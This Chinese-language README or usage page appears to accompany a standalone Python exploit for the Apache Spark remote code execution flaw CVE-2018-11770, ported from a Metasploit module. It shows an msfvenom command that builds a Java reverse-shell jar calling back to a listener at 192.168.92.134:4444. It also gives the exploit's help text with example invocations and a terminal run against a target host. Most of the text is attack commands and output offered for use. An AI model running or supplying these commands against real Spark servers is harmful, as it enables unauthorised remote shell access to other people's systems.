基于 该 Metasploit 模块 重写的独立 Python 3 RCE 漏洞利用程序
在 Python 3.7 环境下 对该目标 进行了测试。
root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# msfvenom -p java/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f jar -o payload/exploit.jar
Payload size: 7550 bytes
Final size of jar file: 7550 bytes
Saved as: payload/exploit.jar
root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# ./CVE-2018-11770.py -h
usage: CVE-2018-11770.py [-h] [-httpdelay HTTPDELAY] -rhost RHOST
[-rport RPORT] -srvhost SRVHOST [-srvport SRVPORT]
[-uripath URIPATH] -payload PAYLOAD
按如下方式调用漏洞利用程序:
./CVE-2018-11770.py -httpdelay 10 -rhost 192.168.92.153 -rport 6066 -srvhost 192.168.92.134 -srvport 8080 -uripath path -payload exploit.jar
必需参数:
-rhost RHOST 运行 Apache Spark 的目标主机,例如 192.168.92.153
-srvhost SRVHOST 本地监听地址。该地址必须是本地机器上 Apache Spark 可达的地址,例如 192.168.92.134
-payload PAYLOAD 恶意 jar 文件的路径,例如 dir/exploit.jar
可选参数:
-httpdelay HTTPDELAY Web 服务器在终止前的等待秒数。默认值:10s
-rport RPORT 运行 Apache Spark 的目标端口。默认值:6066
-srvport SRVPORT 本地监听端口。默认值:8080
-uripath URIPATH 本漏洞利用程序 Web 服务器提供服务的 URI 路径。默认值:path,例如 http://192.168.92.134/path
root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# ./CVE-2018-11770.py -rhost 192.168.92.153 -srvhost 192.168.92.134 -payload payload/exploit.jar
启动 Web 服务器...
将 payload 发送到服务器...